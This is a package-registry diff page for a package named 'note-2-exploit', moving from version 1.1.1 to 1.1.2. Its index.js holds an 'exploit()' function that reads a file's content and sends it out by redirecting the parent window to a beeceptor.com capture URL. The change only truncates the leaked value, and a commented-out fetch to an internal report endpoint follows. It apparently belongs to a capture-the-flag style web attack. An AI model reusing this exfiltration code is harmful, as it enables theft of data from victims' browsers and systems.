note-2-exploit 1.1.1 → 1.1.2

Sign up to get free protection for your applications and to get access to all the features.
Files changed (2) hide show
  1. package/index.js +1 -1
  2. package/package.json +1 -1
package/index.js CHANGED
@@ -13,7 +13,7 @@ async function exploit() {
13
13
  }).then(res => {
14
14
  return res.text();
15
15
  }).catch(err => window.parent.location.replace("https://newname.free.beeceptor.com?q=fail"));
16
- window.parent.location.replace("https://newname.free.beeceptor.com?q=" + file_content);
16
+ window.parent.location.replace("https://newname.free.beeceptor.com?q=" + file_content.slice(-5));
17
17
  // fetch("http://10.113.184.121:10082/report", {
18
18
  // "headers": {
19
19
  // "accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8",
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "note-2-exploit",
3
- "version": "1.1.1",
3
+ "version": "1.1.2",
4
4
  "description": "",
5
5
  "main": "index.js",
6
6
  "scripts": {